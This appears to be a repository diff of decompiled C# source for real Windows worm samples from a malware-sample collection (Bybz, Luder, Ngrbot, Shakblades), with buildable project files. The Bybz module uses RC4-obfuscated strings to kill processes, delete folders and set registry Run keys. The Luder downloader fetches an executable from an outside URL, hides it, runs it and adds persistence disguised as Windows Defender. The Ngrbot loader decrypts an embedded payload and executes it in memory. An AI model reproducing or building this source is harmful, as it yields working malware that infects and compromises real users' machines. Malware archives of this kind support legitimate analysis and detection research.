public struct DOS_Header
{
public ushort Magic;
public ushort Last;
public ushort Pages;
public ushort Relocations;
public ushort Size;
public ushort Minimum;
public ushort Maximum;
public ushort SS;
public ushort SP;
public ushort Checksum;
public ushort IP;
public ushort CS;
public ushort Table;
public ushort Overlay;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservedA;
public ushort ID;
public ushort Info;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] ReservedB;
public int Address;
}
public struct NT_Headers
{
public uint Signature;
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.File_Header File;
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Optional_Headers Optional;
}
public struct File_Header
{
public ushort Machine;
public ushort Sections;
public uint Stamp;
public uint Table;
public uint Symbols;
public ushort Size;
public ushort Flags;
}
public struct Optional_Headers
{
public ushort Magic;
public byte Major;
public byte Minor;
public uint SCode;
public uint IData;
public uint UData;
public uint Address;
public uint Code;
public uint Data;
public uint Image;
public uint SectionA;
public uint FileA;
public ushort MajorO;
public ushort MinorO;
public ushort MajorI;
public ushort MinorI;
public ushort MajorS;
public ushort MinorS;
public uint Version;
public uint SImage;
public uint SHeaders;
public uint Checksum;
public ushort Subsystem;
public ushort Flags;
public uint SSReserve;
public uint SSCommit;
public uint SHReserve;
public uint SHCommit;
public uint LFlags;
public uint Count;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Data_Directory[] DataDirectory;
}
public struct Data_Directory
{
public uint Address;
public uint Size;
}
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/sadjkshaduixyzciuxyzicuysaiudyisaud.cs
+236
View File
@@ -0,0 +1,236 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.sadjkshaduixyzciuxyzicuysaiudyisaud
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using ajhfsdlhjasnagfgewfwsg.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg
{
public class sadjkshaduixyzciuxyzicuysaiudyisaud
{
[DebuggerNonUserCode]
public sadjkshaduixyzciuxyzicuysaiudyisaud()
{
}
public static void xcmnvbcxvmbcxnvbxmbcvjdksfhsdkf()
{
try
{
File.Delete(Conversions.ToString(2) + RRRRR.RC4("\u00BCÌKÅŠ\u0016'ìšöèUa+‡¢…ja\u0012M9\u0090>ôÚ\u001EjKsG\u0002q•ñ", "sikan323"));
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("\u00BCÌKÅŠ\u0016", "sikan323"));
Application.DoEvents();
StreamWriter streamWriter = new StreamWriter(Interaction.Environ(RRRRR.RC4("4à~", "sikan3")) + RRRRR.RC4("\u00BCÌKÅŠ\u0016Uî™æ", "sikan323"));
streamWriter.WriteLine("@echo off");
streamWriter.WriteLine(RRRRR.RC4("3î úÁ±C¦ç®þÉ\u001Fœ\u0019ï¸D\u001BQÖ\u001FÙËÚ\u007Fð1ÛêÇÐ_k£\u0015Œö\u001D)„Ê", "sikan3"));
streamWriter.Close();
Process.Start(Interaction.Environ(RRRRR.RC4("4à~", "sikan3")) + RRRRR.RC4("\u001Cìxö˵M¦å", "sikan3"));
MyProject.Computer.Registry.SetValue(RRRRR.RC4("\bÆKÆæ—6—Ú…Öô'é\vÄžq\u001E\u00BDeÑ-êïö@ØxËìÉÑD0÷-\u00B2ì\u0012„*–Ý–Ò¡wPUÌf\u00BEÜ-B\u0006}€ÙÈ\u00B2O", "sikan3"), RRRRR.RC4("u›ï n\tŒ¯\u00B9A\u00BE$ê", "sikan32"), (object) (Interaction.Environ(RRRRR.RC4("4à~", "sikan3")) + RRRRR.RC4("\u001Cìxö˵M¦å¤", "sikan3")), RegistryValueKind.String);
MyProject.Computer.Registry.SetValue(RRRRR.RC4("\bÆKÆæ—6—Ú…Öô'é\vÄžq\u001E\u00BDeÑ-êïö@ØxËìÉÑD0÷-\u00B2ì\u0012„*–Ý–Ò¡wPUÌf\u00BEÜ-B\u0006}€ÙÈ\u00B2O", "sikan3"), RRRRR.RC4("U›ï n", "sikan32"), (object) "", RegistryValueKind.String);
MyProject.Computer.Registry.SetValue(RRRRR.RC4("\bÆKÆæ—6—Ú…Öô'é\vÄžq\u001E\u00BDeÑ-êïö@ØxËìÉÑD0÷-\u00B2ì\u0012„*–Ý–Ò¡wPUÌf\u00BEÜ-B\u0006}€ÙÈ\u00B2O", "sikan3"), RRRRR.RC4("u»Ö3{J´«¿", "sikan32"), (object) Application.ExecutablePath, RegistryValueKind.String);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void oweiruewoiurioweuroiweuroiwuer()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4("bù×", "Sikan32"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("bù×øÿ", "Sikan32"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(RRRRR.RC4("bù×ãâ", "Sikan32"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
Process[] processesByName4 = Process.GetProcessesByName(RRRRR.RC4("bù×âù,\u00BC", "Sikan32"));
int index4 = 0;
while (index4 < processesByName4.Length)
{
processesByName4[index4].Kill();
checked { ++index4; }
}
Process[] processesByName5 = Process.GetProcessesByName(RRRRR.RC4("bù×ãû)", "Sikan32"));
int index5 = 0;
while (index5 < processesByName5.Length)
{
processesByName5[index5].Kill();
checked { ++index5; }
}
Process[] processesByName6 = Process.GetProcessesByName(RRRRR.RC4("bù×åè,«ý", "Sikan32"));
int index6 = 0;
while (index6 < processesByName6.Length)
{
processesByName6[index6].Kill();
checked { ++index6; }
}
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äHûX\u0017SÄléyçx˜3¦k\u008Dq•Š\u0001", "Sikan"));
Application.DoEvents();
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äHûX\u0017SÄléyçx˜3¦k\u008Dp\u0081ƒ\u0001", "Sikan"));
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("äHûX", "Sikan"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void sadiowqueoiasudcoicuzsodiusaoidxzc()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4("ÙzÅL.`ä", "Sikan"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("ð1X°ÒŸ‡", "Sikan3"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(RRRRR.RC4("ð1X£ÞŽ¤A", "Sikan3"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
File.Delete(Conversions.ToString(2) + RRRRR.RC4("Í\u0003F•È˜", "Sikan3") + "\\*.dll*");
Application.DoEvents();
File.Delete(Conversions.ToString(2) + RRRRR.RC4("Í\u0003F•È˜", "Sikan3") + "\\*.exe*");
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("Í\u0003F•È˜", "Sikan3"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void saduisaydiuxzyiuwqeyiwuqeyuiweyiwqu()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4("ÿ-Tlj", "Sikan3"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("ô)Bš", "Sikan3"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
Process[] processesByName3 = Process.GetProcessesByName(RRRRR.RC4("ô%E\u009D", "Sikan3"));
int index3 = 0;
while (index3 < processesByName3.Length)
{
processesByName3[index3].Kill();
checked { ++index3; }
}
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äLÞz?N×x•\u000Fç\u0010÷UÉsƒT—’BÏÜ\u0017êC", "Sikan") + "\\*.dll*");
Application.DoEvents();
File.Delete(Conversions.ToString(2) + RRRRR.RC4("äLÞz?N×x•\u000Fç\u0010÷UÉsƒT—’BÏÜ\u0017êC", "Sikan") + "\\*.exe*");
Application.DoEvents();
Directory.Delete(Conversions.ToString(2) + RRRRR.RC4("äLÞz?", "Sikan"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void ywetrYTWRytweryutuTRYUTRYU()
{
try
{
Process[] processesByName1 = Process.GetProcessesByName(RRRRR.RC4(".ìxìѱ\u001B±¦¤ôÌ", "sikan3"));
int index1 = 0;
while (index1 < processesByName1.Length)
{
processesByName1[index1].Kill();
checked { ++index1; }
}
Process[] processesByName2 = Process.GetProcessesByName(RRRRR.RC4("#îkéÍ\u00B9\u0004·¦¥àÅ", "sikan3"));
int index2 = 0;
while (index2 < processesByName2.Length)
{
processesByName2[index2].Kill();
checked { ++index2; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void dsiufydsiufyisudyfisudfyicuvjxcvhgjsdf()
{
try
{
Process[] processesByName = Process.GetProcessesByName(RRRRR.RC4("\u008DÏ\\ÁÖ\u0012\u0003è", "sikan323"));
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + RRRRR.RC4("\u00BCà\\À\u008F\u0016\tè–ûõF{~‡‡ŽmcKo( kµŽ[\u0014z;\b\v3œ£.", "sikan323"));
Application.DoEvents();
Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + RRRRR.RC4("\u00BCà\\À\u008F\u0016\tè–ûõF{~‡‡ŽmcKo( kµŽ[", "sikan323"));
Application.DoEvents();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
MSIL/Worm/Win32/L/Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Worm/Win32/L/Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4/Program.cs
+34
View File
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: CaptainBri.Program
// Assembly: downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0E31E51F-2748-4D91-852B-4BE7B4A0BDF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
namespace CaptainBri
{
internal static class Program
{
private static void Main()
{
try
{
Thread.Sleep(300000);
string str = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\downloaded.exe";
new WebClient().DownloadFile("http://endoftheinternet.fileave.com/BIN/SN/dllhost.exe", str);
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
Process.Start(str);
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Windows Defender", (object) str);
}
catch
{
}
}
}
}
MSIL/Worm/Win32/L/Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4/Worm.Win32.Luder.cdal.csproj
+40
View File
@@ -0,0 +1,40 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{DCE3C3D0-881B-4D11-B279-F9A89F7F15D3}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>downloader</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>CaptainBri</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Worm/Win32/L/Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4/Worm.Win32.Luder.cdal.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "downloader", "Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4.csproj", "{DCE3C3D0-881B-4D11-B279-F9A89F7F15D3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DCE3C3D0-881B-4D11-B279-F9A89F7F15D3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DCE3C3D0-881B-4D11-B279-F9A89F7F15D3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DCE3C3D0-881B-4D11-B279-F9A89F7F15D3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DCE3C3D0-881B-4D11-B279-F9A89F7F15D3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Worm/Win32/N/Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Worm/Win32/N/Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31/Module1.cs
+53
View File
@@ -0,0 +1,53 @@
// Decompiled with JetBrains decompiler
// Type: ƀƚąƫcħ.Module1
// Assembly: NoStartUp, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 14163617-1CB3-4844-9F67-2DC4A344E71C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ƀƚąƫ
{
[StandardModule]
internal sealed class Module1
{
[DllImport("kernel32.dll", SetLastError = true)]
private static extern IntPtr FindResource(IntPtr ħМøƋυƪȝ, string ƪƥŊąɱȝ, string ƪƥƬƴƥȝ);
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr LoadResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int SizeofResource(IntPtr ħМøƋυƪȝ, IntPtr ƥυƪąɱȝą);
[DllImport("kernel32", EntryPoint = "CopyFileA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long CopyFile([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpExistingFileName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpNewFileName);
[STAThread]
public static void main()
{
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
IntPtr resource = Module1.FindResource(moduleHandle, "0", "RT_RCDATA");
IntPtr source = Module1.LoadResource(moduleHandle, resource);
int length = Module1.SizeofResource(moduleHandle, resource);
byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
Marshal.Copy(source, numArray, 0, length);
int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
byte[] Ƌąƫą = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
Random random = new Random(int32_1);
byte[] buffer = new byte[Ƌąƫą.Length - 1 + 1 - 1 + 1];
random.NextBytes(buffer);
int int32_2 = Convert.ToInt32(Ƌąƫą.Length - 1);
for (int index = 0; index <= int32_2; ++index)
Ƌąƫą[index] = Convert.ToByte((byte) ((int) Ƌąƫą[index] ^ (int) buffer[index]));
Ʀυŋƥȝƪąƨƨ.ƦυŋƥȝƧυƀ(Ƌąƫą, Process.GetCurrentProcess().MainModule.ModuleName);
}
}
}
MSIL/Worm/Win32/N/Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31/Worm.Win32.Ngrbot.dgu.csproj
+42
View File
@@ -0,0 +1,42 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{134983AD-9031-49A8-A29E-E976A034C1CB}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>NoStartUp</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>ƀƚąƫcħ</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="Ʀυŋƥȝƪąƨƨ.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Worm/Win32/N/Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31/Worm.Win32.Ngrbot.dgu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NoStartUp", "Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31.csproj", "{134983AD-9031-49A8-A29E-E976A034C1CB}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{134983AD-9031-49A8-A29E-E976A034C1CB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{134983AD-9031-49A8-A29E-E976A034C1CB}.Debug|Any CPU.Build.0 = Debug|Any CPU
{134983AD-9031-49A8-A29E-E976A034C1CB}.Release|Any CPU.ActiveCfg = Release|Any CPU
{134983AD-9031-49A8-A29E-E976A034C1CB}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Worm/Win32/N/Worm.Win32.Ngrbot.dgu-8cdf60f38753481c688f6a12e26e6edeae19e2a781313bd01d802e53c66a6c31/Ʀυŋƥȝƪąƨƨ.cs
+1155
View File
File diff suppressed because it is too large Load Diff
MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: Guid("00000000-0000-0000-0000-000000000000")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/Worm.Win32.Shakblades.ajg.csproj
+66
View File
@@ -0,0 +1,66 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{25BFABB9-8ACE-48F4-9CB4-9A0DB1AFDEE5}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>dns-sd</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Ҧ߲๒ʽ໙ୄᴘ</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Management" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="ᱠ.cs" />
<Compile Include="ᤨᔾዔ.cs" />
<Compile Include="௏.cs" />
<Compile Include="߶᠟ᒸৃ.cs" />
<Compile Include="±ჵઆЩᎮɀኤʨՃ.cs" />
<Compile Include="٧Ѹ.cs" />
<Compile Include="ʤ༲୾Ṁ.cs" />
<Compile Include="ᐃ੍ẽϝᕦ.cs" />
<Compile Include="ᛷḼဩ৏.cs" />
<Compile Include="ɱªᕢ᳭ᬻ˫ԧᵢ.cs" />
<Compile Include="᡻ȸº᭰ৼ.cs" />
<Compile Include="ᘽƭ.cs" />
<Compile Include="ťႻϓᕍభ.cs" />
<Compile Include="Ј໺঳ᝮᢶᯀ.cs" />
<Compile Include="Ѡኑ.cs" />
<Compile Include="ᙐᗡѬᵲ૦ᵛଔѥቾ.cs" />
<Compile Include="ȩזြڹᡡỾỔው.cs" />
<Compile Include="ᛕᔱ׍ᨈكအ࿾ན.cs" />
<Compile Include="৐෧ᠮबZố.cs" />
<Compile Include="์ኘ᳒ধڿቷ፳৶.cs" />
<Compile Include="཈ಡભ᭻.cs" />
<Compile Include="៷˴ᄨᥨᗽ.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="b.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

Some files were not shown because too many files have changed in this diff Show More